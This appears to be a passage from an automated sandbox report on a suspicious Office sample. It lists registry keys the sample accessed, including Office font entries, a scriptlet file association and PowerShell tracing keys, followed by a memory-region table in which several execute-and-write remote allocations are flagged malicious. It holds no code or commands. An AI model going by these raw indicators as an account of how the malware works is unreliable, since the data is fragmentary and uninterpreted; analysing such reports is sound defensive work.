HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Miriam Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mistral
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Modern No. 20
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Mongolian Baiti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Monotype Corsiva
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MoolBoran
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Mincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Outlook
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PGothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS PMincho
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Sans Serif
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS Reference Specialty
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MS UI Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MT Extra
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
MV Boli
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Narkisim
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Engraved
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Niagara Solid
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
NSimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Nyala
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
OCR A Extended
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Old English Text MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Onyx
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palace Script MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Palatino Linotype
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Papyrus
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Parchment
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Perpetua Titling MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Plantagenet Cherokee
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Playbill
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
PMingLiU-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Poor Richard
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Pristina
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Raavi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rage Italic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Ravie
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rockwell Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Rod
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sakkal Majalla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Script MT Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Print
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Light
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Semibold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Segoe UI Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shonar Bangla
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Showcard Gothic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Shruti
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimHei
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Simplified Arabic Fixed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
SimSun-ExtB
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Snap ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Stencil
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Sylfaen
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Symbol
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tahoma
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tempus Sans ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Times New Roman
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Traditional Arabic
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Trebuchet MS
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tunga
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Tw Cen MT Condensed Extra Bold
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Utsaah
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vani
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Verdana
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vijaya
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Viner Hand ITC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vivaldi
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vladimir Script
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Vrinda
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Webdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wide Latin
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 2
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\MathFonts
Wingdings 3
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\FileExts\.scT\OpenWithProgids
scriptletfile
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-3017
HKEY_CURRENT_USER_CLASSES\Local Settings\MuiCache\151\52C64B7E
@%SystemRoot%\system32\packager.dll,-3018
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{06290BD2-48AA-11D2-8432-006008C3FBFC} {00000112-0000-0000-C000-000000000046} 0x5
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Shell Extensions\Cached
{2781761E-28E0-4109-99FE-B9D127C57AFE} {56FFCC30-D398-11D0-B2AE-00A0C908FA49} 0xFFFF
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
LangID
HKEY_CURRENT_USER_CLASSES\Local Settings\Software\Microsoft\Windows\Shell\MuiCache
C:\Windows\system32\WFS.exe
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\78BAC
78BAC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Common\LanguageResources\EnabledLanguages
1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
WORDFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections
SavedLegacySettings
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100A0C00100000000F01FEC\Usage
SpellingAndGrammarFiles_3082
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F100C0400100000000F01FEC\Usage
SpellingAndGrammarFiles_1036
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109F10090400100000000F01FEC\Usage
SpellingAndGrammarFiles_1033
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\Discardable\PostSetup\Component Categories64\{56FFCC30-D398-11D0-B2AE-00A0C908FA49}\Enum
Implementing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\DocumentRecovery\78BAC
78BAC
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Data
Settings
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Options
ZoomApp
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Installer\UserData\S-1-5-18\Products\00004109D30000000100000000F01FEC\Usage
ProductFiles
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTF
HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word
MTTA
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASAPI32
FileDirectory
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableFileTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
EnableConsoleTracing
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
ConsoleTracingMask
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
MaxFileSize
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Tracing\powershell_RASMANCS
FileDirectory
HKEY_CURRENT_USER\Software\Microsoft\GDIPlus
FontCachePath
HKEY_CURRENT_USER\Software\Microsoft\ActiveMovie\devenum
Version
There are 339 hidden registries, click here to show them.

Memdumps

Base Address
Regiontype
Protect
Malicious
6A8000
heap
page read and write
malicious
289A000
trusted library allocation
page read and write
malicious
6B1000
heap
page read and write
malicious
3A0D000
trusted library allocation
page read and write
malicious
2890000
trusted library allocation
page read and write
malicious
6A5000
heap
page read and write
malicious
414000
remote allocation
page execute and read and write
malicious
54F000
remote allocation
page execute and read and write
malicious
6A5000
heap
page read and write
malicious
6B7000
heap
page read and write
malicious
28B4000
trusted library allocation
page read and write
malicious
2891000
trusted library allocation
page read and write
malicious
67CF000
trusted library allocation
page read and write
2927000
trusted library allocation
page read and write
38D5000
trusted library allocation
page read and write
39C9000
trusted library allocation
page read and write
C20000
trusted library allocation
page read and write
1C710000
heap
page read and write
2E58000
trusted library allocation
page read and write
1F04000
heap
page read and write
6BDE000
trusted library allocation
page read and write
1300000
trusted library allocation
page read and write
50000
unkown
page readonly
3A32000
trusted library allocation
page read and write
1BA26000
trusted library allocation
page read and write
3AC1000
trusted library allocation
page read and write
6AC3000
trusted library allocation
page read and write
1BA000
trusted library allocation
page execute and read and write
38A1000
trusted library allocation
page read and write
3881000
trusted library allocation
page read and write
B7C000
stack
page read and write
C20000
trusted library allocation
page read and write
2EBE000
trusted library allocation
page read and write
20A9000
heap
page read and write
73BC000
trusted library allocation
page read and write
6AB000
heap
page read and write
10000
heap
page read and write
30D000
stack
page read and write
2EA4000
trusted library allocation
page read and write
5A1C000
trusted library allocation
page read and write
5AAF000
trusted library allocation
page read and write
381A000
trusted library allocation
page read and write
2869000
trusted library allocation
page read and write
70A9000
trusted library allocation
page read and write
35A4000
trusted library allocation
page read and write
432000
heap
page read and write
1332000
unkown
page execute read
20000
heap
page read and write
7378000
trusted library allocation
page read and write
684000
heap
page read and write
7190000
trusted library allocation
page read and write
5970000
heap
page read and write
386D000
trusted library allocation
page read and write
2F32000
trusted library allocation
page read and write
35B4000
trusted library allocation
page read and write
389E000
trusted library allocation
page read and write
691E000
stack
page read and write
6F38000
trusted library allocation
page read and write
1ABA0000
trusted library allocation
page read and write
2A1A000
trusted library allocation
page read and write
28CF000
stack
page read and write
140000
heap
page read and write
6BCF000
stack
page read and write
124000
trusted library allocation
page read and write
88000
heap
page read and write
37B8000
trusted library allocation
page read and write
1BA50000
heap
page read and write
486D000
stack
page read and write
F3E000
stack
page read and write
C4A000
trusted library allocation
page read and write
208000
trusted library allocation
page read and write
419000
remote allocation
page execute and read and write
2AC3000
trusted library allocation
page read and write
5A39000
trusted library allocation
page read and write
33FA000
trusted library allocation
page read and write
1BA24000
trusted library allocation
page read and write
6F2A000
trusted library allocation
page read and write
2A5F000
stack
page read and write
3424000
trusted library allocation
page read and write
426000
heap
page read and write
35CE000
stack
page read and write
20000
heap
page read and write
3933000
trusted library allocation
page read and write
7FF00210000
trusted library allocation
page read and write
38BA000
trusted library allocation
page read and write
210000
heap
page read and write
9D8000
trusted library allocation
page read and write
3957000
trusted library allocation
page read and write
60000
unkown
page readonly
3F0000
trusted library allocation
page read and write
34EA000
trusted library allocation
page read and write
2EDE000
trusted library allocation
page read and write
1C6EE000
stack
page read and write
1C56E000
stack
page read and write
12D01000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
6F5A000
trusted library allocation
page read and write
18A000
stack
page read and write
1F30000
trusted library allocation
page read and write
C20000
trusted library allocation
page read and write
483E000
trusted library allocation
page read and write
704F000
trusted library allocation
page read and write
1B86000
heap
page read and write
1B45B000
heap
page read and write
5E0000
trusted library allocation
page read and write
5260000
trusted library allocation
page read and write
24B0000
heap
page read and write
5F9000
heap
page read and write
1310000
trusted library allocation
page execute and read and write
AE0000
trusted library allocation
page read and write
B19000
trusted library allocation
page read and write
7FF0002C000
trusted library allocation
page execute and read and write
3862000
trusted library allocation
page read and write
7A0000
heap
page read and write
6D9000
heap
page read and write
1AD12000
trusted library allocation
page read and write
5F18000
heap
page read and write
419000
remote allocation
page execute and read and write
81A000
heap
page read and write
255000
trusted library allocation
page read and write
12B0000
heap
page read and write
6F41000
trusted library allocation
page read and write
334000
heap
page read and write
2E92000
trusted library allocation
page read and write
7FF001B0000
trusted library allocation
page read and write
2B5F000
trusted library allocation
page read and write
2D90000
trusted library allocation
page read and write
2850000
trusted library allocation
page read and write
23D2000
heap
page read and write
756B000
trusted library allocation
page read and write
3058000
trusted library allocation
page read and write
382D000
trusted library allocation
page read and write
395A000
trusted library allocation
page read and write
56F9000
trusted library allocation
page read and write
561E000
stack
page read and write
37AF000
trusted library allocation
page read and write
10000
heap
page read and write
A2E000
stack
page read and write
A6F000
stack
page read and write
2A6000
heap
page read and write
38D5000
trusted library allocation
page read and write
767000
heap
page read and write
37FE000
trusted library allocation
page read and write
4F5E000
stack
page read and write
5F0000
trusted library allocation
page read and write
7607000
trusted library allocation
page read and write
56BC000
trusted library allocation
page read and write
37C2000
trusted library allocation
page read and write
3021000
trusted library allocation
page read and write
D24000
heap
page read and write
3B8000
stack
page read and write
24D000
heap
page read and write
7240000
trusted library allocation
page read and write
3433000
trusted library allocation
page read and write
9D0000
trusted library allocation
page read and write
13F2000
unkown
page readonly
5CD0000
heap
page read and write
7FF00180000
trusted library allocation
page read and write
1B40000
heap
page read and write
6AAF000
trusted library allocation
page read and write
7FF00170000
trusted library allocation
page execute and read and write
1272000
heap
page read and write
3CE000
unkown
page read and write
6AAF000
stack
page read and write
739000
heap
page read and write
C20000
trusted library allocation
page read and write
830000
heap
page read and write
37D2000
trusted library allocation
page read and write
49A0000
trusted library allocation
page read and write
2EAE000
trusted library allocation
page read and write
2F91000
trusted library allocation
page read and write
270000
heap
page read and write
2B3F000
trusted library allocation
page read and write
7FF0002A000
trusted library allocation
page execute and read and write
2E3D000
trusted library allocation
page read and write
5731000
trusted library allocation
page read and write
7FF000FA000
trusted library allocation
page execute and read and write
1300000
trusted library allocation
page read and write
55E0000
trusted library allocation
page read and write
4D70000
trusted library allocation
page read and write
3DA0000
trusted library allocation
page read and write
23BD000
stack
page read and write
38F0000
trusted library allocation
page read and write
5978000
heap
page read and write
12B05000
trusted library allocation
page read and write
9E0000
trusted library allocation
page read and write
5A62000
trusted library allocation
page read and write
D70000
trusted library allocation
page read and write
12CD0000
trusted library allocation
page read and write
71DC000
trusted library allocation
page read and write
387D000
trusted library allocation
page read and write
3469000
trusted library allocation
page read and write
6C4E000
stack
page read and write
4F0000
trusted library allocation
page read and write
10000
heap
page read and write
705C000
trusted library allocation
page read and write
3986000
trusted library allocation
page read and write
E30000
heap
page read and write
7FF00260000
trusted library allocation
page read and write
3498000
trusted library allocation
page read and write
5C7000
heap
page read and write
2D8F000
trusted library allocation
page read and write
7A55000
trusted library allocation
page read and write
3042000
trusted library allocation
page read and write
330000
heap
page read and write
BEE000
stack
page read and write | page guard
644000
heap
page read and write
DE0000
heap
page execute and read and write
75F0000
trusted library allocation
page read and write
7FF000F2000
trusted library allocation
page execute and read and write
305E000
trusted library allocation
page read and write
3080000
trusted library allocation
page read and write
1B472000
heap
page read and write
499F000
stack
page read and write
C25000
trusted library allocation
page read and write
74F000
heap
page read and write
3453000
trusted library allocation
page read and write
1300000
trusted library allocation
page read and write
72BE000
trusted library allocation
page read and write
324000
heap
page read and write
5A14000
trusted library allocation
page read and write
2EF6000
trusted library allocation
page read and write
640000
heap
page read and write
56F6000
trusted library allocation
page read and write
C0E000
stack
page read and write
7FF00214000
trusted library allocation
page execute and read and write
8D9E000
stack
page read and write | page guard
5EA0000
trusted library allocation
page read and write
1C5FE000
stack
page read and write
2E78000
trusted library allocation
page read and write
382A000
trusted library allocation
page read and write
2145000
heap
page read and write
450000
trusted library allocation
page read and write
4F0000
heap
page read and write
2B01000
trusted library allocation
page read and write
317000
heap
page read and write
233F000
stack
page read and write
5630000
trusted library allocation
page read and write
2E98000
trusted library allocation
page read and write
707000
heap
page read and write
2F95000
trusted library allocation
page read and write
6C0000
trusted library allocation
page read and write
59B0000
trusted library allocation
page read and write
1B320000
heap
page read and write
1AD000
trusted library allocation
page execute and read and write
2EDD000
trusted library allocation
page read and write
5A92000
trusted library allocation
page read and write
C10000
trusted library allocation
page read and write
C66000
trusted library allocation
page read and write
B20000
trusted library allocation
page read and write
39E1000
trusted library allocation
page read and write
30E5000
trusted library allocation
page read and write
8ECF000
stack
page read and write
7956000
trusted library allocation
page read and write
6FF4000
trusted library allocation
page read and write
60000
unkown
page readonly
38D000
stack
page read and write
71D0000
trusted library allocation
page read and write
7FFFFF00000
trusted library allocation
page execute and read and write
137000
trusted library allocation
page read and write
1BA30000
trusted library allocation
page read and write
540C000
stack
page read and write
1AB60000
trusted library allocation
page read and write
7328000
trusted library allocation
page read and write
5240000
trusted library allocation
page read and write
1CC0000
heap
page read and write
2D43000
trusted library allocation
page read and write
256000
heap
page read and write
301E000
trusted library allocation
page read and write
800000
heap
page read and write
5EC0000
trusted library allocation
page read and write
DF2000
trusted library allocation
page read and write
7FF00224000
trusted library allocation
page execute and read and write
5640000
trusted library allocation
page read and write
53EE000
stack
page read and write
292B000
trusted library allocation
page read and write
5C50000
trusted library section
page read and write
784000
heap
page read and write
BE000
heap
page read and write
33F4000
trusted library allocation
page read and write
2ED5000
trusted library allocation
page read and write
537E000
stack
page read and write
170000
heap
page read and write
7E1E000
trusted library allocation
page read and write
2C3A000
heap
page execute and read and write
502000
heap
page read and write
289A000
trusted library allocation
page read and write
2EB8000
trusted library allocation
page read and write
50000
unkown
page readonly
1B70000
heap
page read and write
C30000
trusted library allocation
page read and write
1070000
trusted library allocation
page read and write
C20000
trusted library allocation
page read and write
6A40000
trusted library allocation
page read and write
848000
heap
page read and write
571D000
trusted library allocation
page read and write
7648000
trusted library allocation
page read and write
2DD8000
trusted library allocation
page read and write
6AB000
heap
page read and write
1190000
trusted library allocation
page read and write
2A10000
trusted library allocation
page read and write
7FF001B0000
trusted library allocation
page execute and read and write
303C000
trusted library allocation
page read and write
7FF001D0000
trusted library allocation
page execute and read and write
5B30000
trusted library allocation
page read and write
5240000
trusted library allocation
page read and write
596E000
stack
page read and write
3426000
trusted library allocation
page read and write
810000
trusted library allocation
page read and write
70B2000
trusted library allocation
page read and write
7FF00220000
trusted library allocation
page execute and read and write
4940000
trusted library allocation
page read and write
1B456000
heap
page read and write
1382000
unkown
page execute read
DF5000
trusted library allocation
page read and write
424000
heap
page read and write
2EEA000
trusted library allocation
page read and write
2891000
trusted library allocation
page read and write
2D2D000
trusted library allocation
page read and write
306E000
trusted library allocation
page read and write
53F0000
trusted library allocation
page read and write
360F000
trusted library allocation
page read and write
2E12000
trusted library allocation
page read and write
3A0C000
trusted library allocation
page read and write
292F000
trusted library allocation
page read and write
38B7000
trusted library allocation
page read and write
938000
trusted library allocation
page read and write
D30000
trusted library allocation
page read and write
2831000
trusted library allocation
page read and write
735000
heap
page read and write
1B47E000
heap
page read and write
6BF2000
trusted library allocation
page read and write
7FF000EA000
trusted library allocation
page execute and read and write
5430000
trusted library allocation
page read and write
5AA6000
trusted library allocation
page read and write
59AE000
stack
page read and write
2E55000
trusted library allocation
page read and write
1B34D000
heap
page read and write
E30000
trusted library allocation
page read and write
7FF00180000
trusted library allocation
page execute and read and write
320000
heap
page read and write
1080000
trusted library allocation
page read and write
6EAE000
trusted library allocation
page read and write
123000
trusted library allocation
page execute and read and write
5A38000
trusted library allocation
page read and write
8ABE000
unkown
page read and write
1324000
trusted library allocation
page read and write
1C2000
trusted library allocation
page read and write
7FF00200000
trusted library allocation
page read and write
392A000
trusted library allocation
page read and write
4F0000
trusted library allocation
page read and write
3439000
trusted library allocation
page read and write
3004000
trusted library allocation
page read and write
3830000
trusted library allocation
page read and write
2F0000
trusted library allocation
page read and write
2863000
trusted library allocation
page read and write
2F9C000
trusted library allocation
page read and write
308B000
trusted library allocation
page read and write
C35000
trusted library allocation
page read and write
1E44000
heap
page read and write
77A5000
trusted library allocation
page read and write
56AF000
trusted library allocation
page read and write
605F000
stack
page read and write
3A2B000
trusted library allocation
page read and write
30C0000
trusted library allocation
page read and write
1BA35000
trusted library allocation
page read and write
3018000
trusted library allocation
page read and write
6F8D000
trusted library allocation
page read and write
B9F000
stack
page read and write
3F0000
heap
page read and write
2DB2000
trusted library allocation
page read and write
35E0000
trusted library allocation
page read and write
D20000
trusted library allocation
page read and write
1D40000
heap
page read and write
8D0000
trusted library section
page read and write
76D000
heap
page read and write
5380000
trusted library allocation
page read and write
1BA20000
remote allocation
page read and write
C20000
trusted library allocation
page read and write
13D000
trusted library allocation
page execute and read and write
DBE000
stack
page read and write
2E52000
trusted library allocation
page read and write
E8F000
stack
page read and write
2E89000
trusted library allocation
page read and write
D28000
trusted library allocation
page read and write
3AE000
heap
page read and write
2D59000
trusted library allocation
page read and write
596A000
heap
page read and write
2E79000
trusted library allocation
page read and write
CB0000
heap
page execute and read and write
A7A000
trusted library allocation
page read and write
57B4000
trusted library allocation
page read and write
5A53000
trusted library allocation
page read and write
B70000
trusted library allocation
page read and write
7632000
trusted library allocation
page read and write
2F96000
trusted library allocation
page read and write
1F6000
heap
page read and write
75F3000
trusted library allocation
page read and write
7FF000FA000
trusted library allocation
page execute and read and write
12D70000
trusted library allocation
page read and write
4F10000
trusted library allocation
page read and write
5F0000
heap
page read and write
10000
heap
page read and write
2FBF000
trusted library allocation
page read and write
71AF000
stack
page read and write
2D89000
trusted library allocation
page read and write
B80000
trusted library allocation
page read and write
1C70000
heap
page read and write
12B2C000
trusted library allocation
page read and write
780A000
trusted library allocation
page read and write
20000
heap
page read and write
1B50000
heap
page read and write
D42000
heap
page read and write
2ECC000
trusted library allocation
page read and write
3427000
trusted library allocation
page read and write
6D9000
heap
page read and write
5BB8000
trusted library allocation
page read and write
7686000
trusted library allocation
page read and write
